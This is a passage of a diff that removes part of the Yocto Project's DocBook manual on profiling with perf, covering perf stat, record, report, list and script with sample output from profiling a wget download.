-        and go away; until then, we'll cover those other tools in these pages
-        and in many cases show how the same things can be accomplished in
-        perf and the other tools when it seems useful to do so.
-    </para>
-
-    <para>
-        The coverage below details some of the most common ways you'll likely
-        want to apply the tool; full documentation can be found either within
-        the tool itself or in the man pages at
-        <ulink url='http://linux.die.net/man/1/perf'>perf(1)</ulink>.
-    </para>
-
-    <section id='perf-setup'>
-        <title>Setup</title>
-
-        <para>
-            For this section, we'll assume you've already performed the basic
-            setup outlined in the General Setup section.
-        </para>
-
-        <para>
-            In particular, you'll get the most mileage out of perf if you
-            profile an image built with the following in your
-            <filename>local.conf</filename> file:
-            <literallayout class='monospaced'>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-INHIBIT_PACKAGE_STRIP'>INHIBIT_PACKAGE_STRIP</ulink> = "1"
-            </literallayout>
-        </para>
-
-        <para>
-            perf runs on the target system for the most part. You can archive
-            profile data and copy it to the host for analysis, but for the
-            rest of this document we assume you've ssh'ed to the host and
-            will be running the perf commands on the target.
-        </para>
-    </section>
-
-    <section id='perf-basic-usage'>
-        <title>Basic Usage</title>
-
-        <para>
-            The perf tool is pretty much self-documenting. To remind yourself
-            of the available commands, simply type 'perf', which will show you
-            basic usage along with the available perf subcommands:
-            <literallayout class='monospaced'>
-     root@crownbay:~# perf
-
-     usage: perf [--version] [--help] COMMAND [ARGS]
-
-     The most commonly used perf commands are:
-       annotate        Read perf.data (created by perf record) and display annotated code
-       archive         Create archive with object files with build-ids found in perf.data file
-       bench           General framework for benchmark suites
-       buildid-cache   Manage build-id cache.
-       buildid-list    List the buildids in a perf.data file
-       diff            Read two perf.data files and display the differential profile
-       evlist          List the event names in a perf.data file
-       inject          Filter to augment the events stream with additional information
-       kmem            Tool to trace/measure kernel memory(slab) properties
-       kvm             Tool to trace/measure kvm guest os
-       list            List all symbolic event types
-       lock            Analyze lock events
-       probe           Define new dynamic tracepoints
-       record          Run a command and record its profile into perf.data
-       report          Read perf.data (created by perf record) and display the profile
-       sched           Tool to trace/measure scheduler properties (latencies)
-       script          Read perf.data (created by perf record) and display trace output
-       stat            Run a command and gather performance counter statistics
-       test            Runs sanity tests.
-       timechart       Tool to visualize total system behavior during a workload
-       top             System profiling tool.
-
-     See 'perf help COMMAND' for more information on a specific command.
-            </literallayout>
-        </para>
-
-        <section id='using-perf-to-do-basic-profiling'>
-            <title>Using perf to do Basic Profiling</title>
-
-            <para>
-                As a simple test case, we'll profile the 'wget' of a fairly large
-                file, which is a minimally interesting case because it has both
-                file and network I/O aspects, and at least in the case of standard
-                Yocto images, it's implemented as part of busybox, so the methods
-                we use to analyze it can be used in a very similar way to the whole
-                host of supported busybox applets in Yocto.
-                <literallayout class='monospaced'>
-     root@crownbay:~# rm linux-2.6.19.2.tar.bz2; \
-     wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
-                </literallayout>
-                The quickest and easiest way to get some basic overall data about
-                what's going on for a particular workload is to profile it using
-                'perf stat'. 'perf stat' basically profiles using a few default
-                counters and displays the summed counts at the end of the run:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf stat wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
-     Connecting to downloads.yoctoproject.org (140.211.169.59:80)
-     linux-2.6.19.2.tar.b 100% |***************************************************| 41727k  0:00:00 ETA
-
-     Performance counter stats for 'wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>':
-
-           4597.223902 task-clock                #    0.077 CPUs utilized
-                 23568 context-switches          #    0.005 M/sec
-                    68 CPU-migrations            #    0.015 K/sec
-                   241 page-faults               #    0.052 K/sec
-            3045817293 cycles                    #    0.663 GHz
-       &lt;not supported&gt; stalled-cycles-frontend
-       &lt;not supported&gt; stalled-cycles-backend
-             858909167 instructions              #    0.28  insns per cycle
-             165441165 branches                  #   35.987 M/sec
-              19550329 branch-misses             #   11.82% of all branches
-
-          59.836627620 seconds time elapsed
-                </literallayout>
-                Many times such a simple-minded test doesn't yield much of
-                interest, but sometimes it does (see Real-world Yocto bug
-                (slow loop-mounted write speed)).
-            </para>
-
-            <para>
-                Also, note that 'perf stat' isn't restricted to a fixed set of
-                counters - basically any event listed in the output of 'perf list'
-                can be tallied by 'perf stat'. For example, suppose we wanted to
-                see a summary of all the events related to kernel memory
-                allocation/freeing along with cache hits and misses:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf stat -e kmem:* -e cache-references -e cache-misses wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
-     Connecting to downloads.yoctoproject.org (140.211.169.59:80)
-     linux-2.6.19.2.tar.b 100% |***************************************************| 41727k  0:00:00 ETA
-
-     Performance counter stats for 'wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>':
-
-                  5566 kmem:kmalloc
-                125517 kmem:kmem_cache_alloc
-                     0 kmem:kmalloc_node
-                     0 kmem:kmem_cache_alloc_node
-                 34401 kmem:kfree
-                 69920 kmem:kmem_cache_free
-                   133 kmem:mm_page_free
-                    41 kmem:mm_page_free_batched
-                 11502 kmem:mm_page_alloc
-                 11375 kmem:mm_page_alloc_zone_locked
-                     0 kmem:mm_page_pcpu_drain
-                     0 kmem:mm_page_alloc_extfrag
-              66848602 cache-references
-               2917740 cache-misses              #    4.365 % of all cache refs
-
-          44.831023415 seconds time elapsed
-                </literallayout>
-                So 'perf stat' gives us a nice easy way to get a quick overview of
-                what might be happening for a set of events, but normally we'd
-                need a little more detail in order to understand what's going on
-                in a way that we can act on in a useful way.
-            </para>
-
-            <para>
-                To dive down into a next level of detail, we can use 'perf
-                record'/'perf report' which will collect profiling data and
-                present it to use using an interactive text-based UI (or
-                simply as text if we specify --stdio to 'perf report').
-            </para>
-
-            <para>
-                As our first attempt at profiling this workload, we'll simply
-                run 'perf record', handing it the workload we want to profile
-                (everything after 'perf record' and any perf options we hand
-                it - here none - will be executed in a new shell). perf collects
-                samples until the process exits and records them in a file named
-                'perf.data' in the current working directory.
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf record wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
-
-     Connecting to downloads.yoctoproject.org (140.211.169.59:80)
-     linux-2.6.19.2.tar.b 100% |************************************************| 41727k  0:00:00 ETA
-     [ perf record: Woken up 1 times to write data ]
-     [ perf record: Captured and wrote 0.176 MB perf.data (~7700 samples) ]
-            </literallayout>
-            To see the results in a 'text-based UI' (tui), simply run
-            'perf report', which will read the perf.data file in the current
-            working directory and display the results in an interactive UI:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf report
-                </literallayout>
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-wget-flat-stripped.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                The above screenshot displays a 'flat' profile, one entry for
-                each 'bucket' corresponding to the functions that were profiled
-                during the profiling run, ordered from the most popular to the
-                least (perf has options to sort in various orders and keys as
-                well as display entries only above a certain threshold and so
-                on - see the perf documentation for details). Note that this
-                includes both userspace functions (entries containing a [.]) and
-                kernel functions accounted to the process (entries containing
-                a [k]). (perf has command-line modifiers that can be used to
-                restrict the profiling to kernel or userspace, among others).
-            </para>
-
-            <para>
-                Notice also that the above report shows an entry for 'busybox',
-                which is the executable that implements 'wget' in Yocto, but that
-                instead of a useful function name in that entry, it displays
-                a not-so-friendly hex value instead. The steps below will show
-                how to fix that problem.
-            </para>
-
-            <para>
-                Before we do that, however, let's try running a different profile,
-                one which shows something a little more interesting. The only
-                difference between the new profile and the previous one is that
-                we'll add the -g option, which will record not just the address
-                of a sampled function, but the entire callchain to the sampled
-                function as well:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf record -g wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
-     Connecting to downloads.yoctoproject.org (140.211.169.59:80)
-     linux-2.6.19.2.tar.b 100% |************************************************| 41727k  0:00:00 ETA
-     [ perf record: Woken up 3 times to write data ]
-     [ perf record: Captured and wrote 0.652 MB perf.data (~28476 samples) ]
-
-
-     root@crownbay:~# perf report
-                </literallayout>
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-wget-g-copy-to-user-expanded-stripped.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                Using the callgraph view, we can actually see not only which
-                functions took the most time, but we can also see a summary of
-                how those functions were called and learn something about how the
-                program interacts with the kernel in the process.
-            </para>
-
-            <para>
-                Notice that each entry in the above screenshot now contains a '+'
-                on the left-hand side. This means that we can expand the entry and
-                drill down into the callchains that feed into that entry.
-                Pressing 'enter' on any one of them will expand the callchain
-                (you can also press 'E' to expand them all at the same time or 'C'
-                to collapse them all).
-            </para>
-
-            <para>
-                In the screenshot above, we've toggled the __copy_to_user_ll()
-                entry and several subnodes all the way down. This lets us see
-                which callchains contributed to the profiled __copy_to_user_ll()
-                function which contributed 1.77% to the total profile.
-            </para>
-
-            <para>
-                As a bit of background explanation for these callchains, think
-                about what happens at a high level when you run wget to get a file
-                out on the network. Basically what happens is that the data comes
-                into the kernel via the network connection (socket) and is passed
-                to the userspace program 'wget' (which is actually a part of
-                busybox, but that's not important for now), which takes the buffers
-                the kernel passes to it and writes it to a disk file to save it.
-            </para>
-
-            <para>
-                The part of this process that we're looking at in the above call
-                stacks is the part where the kernel passes the data it's read from
-                the socket down to wget i.e. a copy-to-user.
-            </para>
-
-            <para>
-                Notice also that here there's also a case where the hex value
-                is displayed in the callstack, here in the expanded
-                sys_clock_gettime() function. Later we'll see it resolve to a
-                userspace function call in busybox.
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-wget-g-copy-from-user-expanded-stripped.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                The above screenshot shows the other half of the journey for the
-                data - from the wget program's userspace buffers to disk. To get
-                the buffers to disk, the wget program issues a write(2), which
-                does a copy-from-user to the kernel, which then takes care via
-                some circuitous path (probably also present somewhere in the
-                profile data), to get it safely to disk.
-            </para>
-
-            <para>
-                Now that we've seen the basic layout of the profile data and the
-                basics of how to extract useful information out of it, let's get
-                back to the task at hand and see if we can get some basic idea
-                about where the time is spent in the program we're profiling,
-                wget. Remember that wget is actually implemented as an applet
-                in busybox, so while the process name is 'wget', the executable
-                we're actually interested in is busybox. So let's expand the
-                first entry containing busybox:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-wget-busybox-expanded-stripped.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                Again, before we expanded we saw that the function was labeled
-                with a hex value instead of a symbol as with most of the kernel
-                entries. Expanding the busybox entry doesn't make it any better.
-            </para>
-
-            <para>
-                The problem is that perf can't find the symbol information for the
-                busybox binary, which is actually stripped out by the Yocto build
-                system.
-            </para>
-
-            <para>
-                One way around that is to put the following in your
-                <filename>local.conf</filename> file when you build the image:
-                <literallayout class='monospaced'>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-INHIBIT_PACKAGE_STRIP'>INHIBIT_PACKAGE_STRIP</ulink> = "1"
-                </literallayout>
-                However, we already have an image with the binaries stripped,
-                so what can we do to get perf to resolve the symbols? Basically
-                we need to install the debuginfo for the busybox package.
-            </para>
-
-            <para>
-                To generate the debug info for the packages in the image, we can
-                add dbg-pkgs to EXTRA_IMAGE_FEATURES in local.conf. For example:
-                <literallayout class='monospaced'>
-     EXTRA_IMAGE_FEATURES = "debug-tweaks tools-profile dbg-pkgs"
-                </literallayout>
-                Additionally, in order to generate the type of debuginfo that
-                perf understands, we also need to set
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_DEBUG_SPLIT_STYLE'><filename>PACKAGE_DEBUG_SPLIT_STYLE</filename></ulink>
-                in the <filename>local.conf</filename> file:
-                <literallayout class='monospaced'>
-     PACKAGE_DEBUG_SPLIT_STYLE = 'debug-file-directory'
-                </literallayout>
-                Once we've done that, we can install the debuginfo for busybox.
-                The debug packages once built can be found in
-                build/tmp/deploy/rpm/* on the host system. Find the
-                busybox-dbg-...rpm file and copy it to the target. For example:
-                <literallayout class='monospaced'>
-     [trz@empanada core2]$ scp /home/trz/yocto/crownbay-tracing-dbg/build/tmp/deploy/rpm/core2_32/busybox-dbg-1.20.2-r2.core2_32.rpm root@192.168.1.31:
-     root@192.168.1.31's password:
-     busybox-dbg-1.20.2-r2.core2_32.rpm                     100% 1826KB   1.8MB/s   00:01
-                </literallayout>
-                Now install the debug rpm on the target:
-                <literallayout class='monospaced'>
-     root@crownbay:~# rpm -i busybox-dbg-1.20.2-r2.core2_32.rpm
-                </literallayout>
-                Now that the debuginfo is installed, we see that the busybox
-                entries now display their functions symbolically:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-wget-busybox-debuginfo.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                If we expand one of the entries and press 'enter' on a leaf node,
-                we're presented with a menu of actions we can take to get more
-                information related to that entry:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-wget-busybox-dso-zoom-menu.png" width="6in" depth="2in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                One of these actions allows us to show a view that displays a
-                busybox-centric view of the profiled functions (in this case we've
-                also expanded all the nodes using the 'E' key):
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-wget-busybox-dso-zoom.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                Finally, we can see that now that the busybox debuginfo is
-                installed, the previously unresolved symbol in the
-                sys_clock_gettime() entry mentioned previously is now resolved,
-                and shows that the sys_clock_gettime system call that was the
-                source of 6.75% of the copy-to-user overhead was initiated by
-                the handle_input() busybox function:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-wget-g-copy-to-user-expanded-debuginfo.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                At the lowest level of detail, we can dive down to the assembly
-                level and see which instructions caused the most overhead in a
-                function. Pressing 'enter' on the 'udhcpc_main' function, we're
-                again presented with a menu:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-wget-busybox-annotate-menu.png" width="6in" depth="2in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                Selecting 'Annotate udhcpc_main', we get a detailed listing of
-                percentages by instruction for the udhcpc_main function. From the
-                display, we can see that over 50% of the time spent in this
-                function is taken up by a couple tests and the move of a
-                constant (1) to a register:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-wget-busybox-annotate-udhcpc.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                As a segue into tracing, let's try another profile using a
-                different counter, something other than the default 'cycles'.
-            </para>
-
-            <para>
-                The tracing and profiling infrastructure in Linux has become
-                unified in a way that allows us to use the same tool with a
-                completely different set of counters, not just the standard
-                hardware counters that traditional tools have had to restrict
-                themselves to (of course the traditional tools can also make use
-                of the expanded possibilities now available to them, and in some
-                cases have, as mentioned previously).
-            </para>
-
-            <para>
-                We can get a list of the available events that can be used to
-                profile a workload via 'perf list':
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf list
-
-     List of pre-defined events (to be used in -e):
-      cpu-cycles OR cycles                               [Hardware event]
-      stalled-cycles-frontend OR idle-cycles-frontend    [Hardware event]
-      stalled-cycles-backend OR idle-cycles-backend      [Hardware event]
-      instructions                                       [Hardware event]
-      cache-references                                   [Hardware event]
-      cache-misses                                       [Hardware event]
-      branch-instructions OR branches                    [Hardware event]
-      branch-misses                                      [Hardware event]
-      bus-cycles                                         [Hardware event]
-      ref-cycles                                         [Hardware event]
-
-      cpu-clock                                          [Software event]
-      task-clock                                         [Software event]
-      page-faults OR faults                              [Software event]
-      minor-faults                                       [Software event]
-      major-faults                                       [Software event]
-      context-switches OR cs                             [Software event]
-      cpu-migrations OR migrations                       [Software event]
-      alignment-faults                                   [Software event]
-      emulation-faults                                   [Software event]
-
-      L1-dcache-loads                                    [Hardware cache event]
-      L1-dcache-load-misses                              [Hardware cache event]
-      L1-dcache-prefetch-misses                          [Hardware cache event]
-      L1-icache-loads                                    [Hardware cache event]
-      L1-icache-load-misses                              [Hardware cache event]
-      .
-      .
-      .
-      rNNN                                               [Raw hardware event descriptor]
-      cpu/t1=v1[,t2=v2,t3 ...]/modifier                  [Raw hardware event descriptor]
-       (see 'perf list --help' on how to encode it)
-
-      mem:&lt;addr&gt;[:access]                                [Hardware breakpoint]
-
-      sunrpc:rpc_call_status                             [Tracepoint event]
-      sunrpc:rpc_bind_status                             [Tracepoint event]
-      sunrpc:rpc_connect_status                          [Tracepoint event]
-      sunrpc:rpc_task_begin                              [Tracepoint event]
-      skb:kfree_skb                                      [Tracepoint event]
-      skb:consume_skb                                    [Tracepoint event]
-      skb:skb_copy_datagram_iovec                        [Tracepoint event]
-      net:net_dev_xmit                                   [Tracepoint event]
-      net:net_dev_queue                                  [Tracepoint event]
-      net:netif_receive_skb                              [Tracepoint event]
-      net:netif_rx                                       [Tracepoint event]
-      napi:napi_poll                                     [Tracepoint event]
-      sock:sock_rcvqueue_full                            [Tracepoint event]
-      sock:sock_exceed_buf_limit                         [Tracepoint event]
-      udp:udp_fail_queue_rcv_skb                         [Tracepoint event]
-      hda:hda_send_cmd                                   [Tracepoint event]
-      hda:hda_get_response                               [Tracepoint event]
-      hda:hda_bus_reset                                  [Tracepoint event]
-      scsi:scsi_dispatch_cmd_start                       [Tracepoint event]
-      scsi:scsi_dispatch_cmd_error                       [Tracepoint event]
-      scsi:scsi_eh_wakeup                                [Tracepoint event]
-      drm:drm_vblank_event                               [Tracepoint event]
-      drm:drm_vblank_event_queued                        [Tracepoint event]
-      drm:drm_vblank_event_delivered                     [Tracepoint event]
-      random:mix_pool_bytes                              [Tracepoint event]
-      random:mix_pool_bytes_nolock                       [Tracepoint event]
-      random:credit_entropy_bits                         [Tracepoint event]
-      gpio:gpio_direction                                [Tracepoint event]
-      gpio:gpio_value                                    [Tracepoint event]
-      block:block_rq_abort                               [Tracepoint event]
-      block:block_rq_requeue                             [Tracepoint event]
-      block:block_rq_issue                               [Tracepoint event]
-      block:block_bio_bounce                             [Tracepoint event]
-      block:block_bio_complete                           [Tracepoint event]
-      block:block_bio_backmerge                          [Tracepoint event]
-      .
-      .
-      writeback:writeback_wake_thread                    [Tracepoint event]
-      writeback:writeback_wake_forker_thread             [Tracepoint event]
-      writeback:writeback_bdi_register                   [Tracepoint event]
-      .
-      .
-      writeback:writeback_single_inode_requeue           [Tracepoint event]
-      writeback:writeback_single_inode                   [Tracepoint event]
-      kmem:kmalloc                                       [Tracepoint event]
-      kmem:kmem_cache_alloc                              [Tracepoint event]
-      kmem:mm_page_alloc                                 [Tracepoint event]
-      kmem:mm_page_alloc_zone_locked                     [Tracepoint event]
-      kmem:mm_page_pcpu_drain                            [Tracepoint event]
-      kmem:mm_page_alloc_extfrag                         [Tracepoint event]
-      vmscan:mm_vmscan_kswapd_sleep                      [Tracepoint event]
-      vmscan:mm_vmscan_kswapd_wake                       [Tracepoint event]
-      vmscan:mm_vmscan_wakeup_kswapd                     [Tracepoint event]
-      vmscan:mm_vmscan_direct_reclaim_begin              [Tracepoint event]
-      .
-      .
-      module:module_get                                  [Tracepoint event]
-      module:module_put                                  [Tracepoint event]
-      module:module_request                              [Tracepoint event]
-      sched:sched_kthread_stop                           [Tracepoint event]
-      sched:sched_wakeup                                 [Tracepoint event]
-      sched:sched_wakeup_new                             [Tracepoint event]
-      sched:sched_process_fork                           [Tracepoint event]
-      sched:sched_process_exec                           [Tracepoint event]
-      sched:sched_stat_runtime                           [Tracepoint event]
-      rcu:rcu_utilization                                [Tracepoint event]
-      workqueue:workqueue_queue_work                     [Tracepoint event]
-      workqueue:workqueue_execute_end                    [Tracepoint event]
-      signal:signal_generate                             [Tracepoint event]
-      signal:signal_deliver                              [Tracepoint event]
-      timer:timer_init                                   [Tracepoint event]
-      timer:timer_start                                  [Tracepoint event]
-      timer:hrtimer_cancel                               [Tracepoint event]
-      timer:itimer_state                                 [Tracepoint event]
-      timer:itimer_expire                                [Tracepoint event]
-      irq:irq_handler_entry                              [Tracepoint event]
-      irq:irq_handler_exit                               [Tracepoint event]
-      irq:softirq_entry                                  [Tracepoint event]
-      irq:softirq_exit                                   [Tracepoint event]
-      irq:softirq_raise                                  [Tracepoint event]
-      printk:console                                     [Tracepoint event]
-      task:task_newtask                                  [Tracepoint event]
-      task:task_rename                                   [Tracepoint event]
-      syscalls:sys_enter_socketcall                      [Tracepoint event]
-      syscalls:sys_exit_socketcall                       [Tracepoint event]
-      .
-      .
-      .
-      syscalls:sys_enter_unshare                         [Tracepoint event]
-      syscalls:sys_exit_unshare                          [Tracepoint event]
-      raw_syscalls:sys_enter                             [Tracepoint event]
-      raw_syscalls:sys_exit                              [Tracepoint event]
-                </literallayout>
-            </para>
-
-            <informalexample>
-                <emphasis>Tying it Together:</emphasis> These are exactly the same set of events defined
-                by the trace event subsystem and exposed by
-                ftrace/tracecmd/kernelshark as files in
-                /sys/kernel/debug/tracing/events, by SystemTap as
-                kernel.trace("tracepoint_name") and (partially) accessed by LTTng.
-            </informalexample>
-
-            <para>
-                Only a subset of these would be of interest to us when looking at
-                this workload, so let's choose the most likely subsystems
-                (identified by the string before the colon in the Tracepoint events)
-                and do a 'perf stat' run using only those wildcarded subsystems:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf stat -e skb:* -e net:* -e napi:* -e sched:* -e workqueue:* -e irq:* -e syscalls:* wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
-     Performance counter stats for 'wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>':
-
-                 23323 skb:kfree_skb
-                     0 skb:consume_skb
-                 49897 skb:skb_copy_datagram_iovec
-                  6217 net:net_dev_xmit
-                  6217 net:net_dev_queue
-                  7962 net:netif_receive_skb
-                     2 net:netif_rx
-                  8340 napi:napi_poll
-                     0 sched:sched_kthread_stop
-                     0 sched:sched_kthread_stop_ret
-                  3749 sched:sched_wakeup
-                     0 sched:sched_wakeup_new
-                     0 sched:sched_switch
-                    29 sched:sched_migrate_task
-                     0 sched:sched_process_free
-                     1 sched:sched_process_exit
-                     0 sched:sched_wait_task
-                     0 sched:sched_process_wait
-                     0 sched:sched_process_fork
-                     1 sched:sched_process_exec
-                     0 sched:sched_stat_wait
-         2106519415641 sched:sched_stat_sleep
-                     0 sched:sched_stat_iowait
-             147453613 sched:sched_stat_blocked
-           12903026955 sched:sched_stat_runtime
-                     0 sched:sched_pi_setprio
-                  3574 workqueue:workqueue_queue_work
-                  3574 workqueue:workqueue_activate_work
-                     0 workqueue:workqueue_execute_start
-                     0 workqueue:workqueue_execute_end
-                 16631 irq:irq_handler_entry
-                 16631 irq:irq_handler_exit
-                 28521 irq:softirq_entry
-                 28521 irq:softirq_exit
-                 28728 irq:softirq_raise
-                     1 syscalls:sys_enter_sendmmsg
-                     1 syscalls:sys_exit_sendmmsg
-                     0 syscalls:sys_enter_recvmmsg
-                     0 syscalls:sys_exit_recvmmsg
-                    14 syscalls:sys_enter_socketcall
-                    14 syscalls:sys_exit_socketcall
-                       .
-                       .
-                       .
-                 16965 syscalls:sys_enter_read
-                 16965 syscalls:sys_exit_read
-                 12854 syscalls:sys_enter_write
-                 12854 syscalls:sys_exit_write
-                       .
-                       .
-                       .
-
-          58.029710972 seconds time elapsed
-                </literallayout>
-                Let's pick one of these tracepoints and tell perf to do a profile
-                using it as the sampling event:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf record -g -e sched:sched_wakeup wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
-                </literallayout>
-            </para>
-
-            <para>
-                <imagedata fileref="figures/sched-wakeup-profile.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                The screenshot above shows the results of running a profile using
-                sched:sched_switch tracepoint, which shows the relative costs of
-                various paths to sched_wakeup (note that sched_wakeup is the
-                name of the tracepoint - it's actually defined just inside
-                ttwu_do_wakeup(), which accounts for the function name actually
-                displayed in the profile:
-                <literallayout class='monospaced'>
-     /*
-      * Mark the task runnable and perform wakeup-preemption.
-      */
-     static void
-     ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
-     {
-          trace_sched_wakeup(p, true);
-          .
-          .
-          .
-     }
-                </literallayout>
-                A couple of the more interesting callchains are expanded and
-                displayed above, basically some network receive paths that
-                presumably end up waking up wget (busybox) when network data is
-                ready.
-            </para>
-
-            <para>
-                Note that because tracepoints are normally used for tracing,
-                the default sampling period for tracepoints is 1 i.e. for
-                tracepoints perf will sample on every event occurrence (this
-                can be changed using the -c option). This is in contrast to
-                hardware counters such as for example the default 'cycles'
-                hardware counter used for normal profiling, where sampling
-                periods are much higher (in the thousands) because profiling should
-                have as low an overhead as possible and sampling on every cycle
-                would be prohibitively expensive.
-            </para>
-        </section>
-
-        <section id='using-perf-to-do-basic-tracing'>
-            <title>Using perf to do Basic Tracing</title>
-
-            <para>
-                Profiling is a great tool for solving many problems or for
-                getting a high-level view of what's going on with a workload or
-                across the system. It is however by definition an approximation,
-                as suggested by the most prominent word associated with it,
-                'sampling'. On the one hand, it allows a representative picture of
-                what's going on in the system to be cheaply taken, but on the other
-                hand, that cheapness limits its utility when that data suggests a
-                need to 'dive down' more deeply to discover what's really going
-                on. In such cases, the only way to see what's really going on is
-                to be able to look at (or summarize more intelligently) the
-                individual steps that go into the higher-level behavior exposed
-                by the coarse-grained profiling data.
-            </para>
-
-            <para>
-                As a concrete example, we can trace all the events we think might
-                be applicable to our workload:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf record -g -e skb:* -e net:* -e napi:* -e sched:sched_switch -e sched:sched_wakeup -e irq:*
-      -e syscalls:sys_enter_read -e syscalls:sys_exit_read -e syscalls:sys_enter_write -e syscalls:sys_exit_write
-      wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
-                </literallayout>
-                We can look at the raw trace output using 'perf script' with no
-                arguments:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf script
-
-           perf  1262 [000] 11624.857082: sys_exit_read: 0x0
-           perf  1262 [000] 11624.857193: sched_wakeup: comm=migration/0 pid=6 prio=0 success=1 target_cpu=000
-           wget  1262 [001] 11624.858021: softirq_raise: vec=1 [action=TIMER]
-           wget  1262 [001] 11624.858074: softirq_entry: vec=1 [action=TIMER]
-           wget  1262 [001] 11624.858081: softirq_exit: vec=1 [action=TIMER]
-           wget  1262 [001] 11624.858166: sys_enter_read: fd: 0x0003, buf: 0xbf82c940, count: 0x0200
-           wget  1262 [001] 11624.858177: sys_exit_read: 0x200
-           wget  1262 [001] 11624.858878: kfree_skb: skbaddr=0xeb248d80 protocol=0 location=0xc15a5308
-           wget  1262 [001] 11624.858945: kfree_skb: skbaddr=0xeb248000 protocol=0 location=0xc15a5308
-           wget  1262 [001] 11624.859020: softirq_raise: vec=1 [action=TIMER]
-           wget  1262 [001] 11624.859076: softirq_entry: vec=1 [action=TIMER]
-           wget  1262 [001] 11624.859083: softirq_exit: vec=1 [action=TIMER]
-           wget  1262 [001] 11624.859167: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
-           wget  1262 [001] 11624.859192: sys_exit_read: 0x1d7
-           wget  1262 [001] 11624.859228: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
-           wget  1262 [001] 11624.859233: sys_exit_read: 0x0
-           wget  1262 [001] 11624.859573: sys_enter_read: fd: 0x0003, buf: 0xbf82c580, count: 0x0200
-           wget  1262 [001] 11624.859584: sys_exit_read: 0x200
-           wget  1262 [001] 11624.859864: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
-           wget  1262 [001] 11624.859888: sys_exit_read: 0x400
-           wget  1262 [001] 11624.859935: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
-           wget  1262 [001] 11624.859944: sys_exit_read: 0x400
-                </literallayout>
-                This gives us a detailed timestamped sequence of events that
-                occurred within the workload with respect to those events.
-            </para>
-
-            <para>
-                In many ways, profiling can be viewed as a subset of tracing -
-                theoretically, if you have a set of trace events that's sufficient
-                to capture all the important aspects of a workload, you can derive
-                any of the results or views that a profiling run can.
-            </para>
-
-            <para>
-                Another aspect of traditional profiling is that while powerful in
-                many ways, it's limited by the granularity of the underlying data.
-                Profiling tools offer various ways of sorting and presenting the
-                sample data, which make it much more useful and amenable to user
-                experimentation, but in the end it can't be used in an open-ended
-                way to extract data that just isn't present as a consequence of
